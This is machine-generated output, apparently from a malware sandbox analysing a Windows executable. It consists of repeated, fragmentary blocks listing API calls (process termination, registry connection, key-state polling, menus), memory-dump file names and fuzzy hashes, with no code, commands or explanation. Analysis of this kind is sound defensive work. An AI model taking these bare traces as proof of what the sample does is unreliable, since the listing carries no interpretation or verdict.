                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                                                                                                                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Virtual
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00433FDF
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00433FF7
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00434006
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00434017
                                                                                                                                                                                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00434022
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00434029
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 839392675-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A90E8,14000000,0042E252), ref: 00432FF8
                                                                                                                                                                                                                                                                                                                                                                                                                                • LockServiceDatabase.ADVAPI32(00000000), ref: 00433005
                                                                                                                                                                                                                                                                                                                                                                                                                                • UnlockServiceDatabase.ADVAPI32(00000000), ref: 00433010
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00433019
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00433024
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00433034
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1690418490-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                                                                                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                                                                                                                                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 00415209
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 442100245-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0045F94A
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 621800784-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3884216118-234962358
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsMenu.USER32(?), ref: 0044854D
                                                                                                                                                                                                                                                                                                                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                                                                                                                                                                                                                                                                                                                                                                • DrawMenuBar.USER32 ref: 004485AF
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1589278365-1403004172
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Handle
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: nul
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2519475695-2873401336
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Handle
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: nul
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2519475695-2873401336
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 0-1011021900
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFocus.USER32 ref: 0046157B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00461608
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %s%d
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2645982514-1110647743
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00475A4D
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 15295421-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2449869053-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3539004672-0
APIs
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
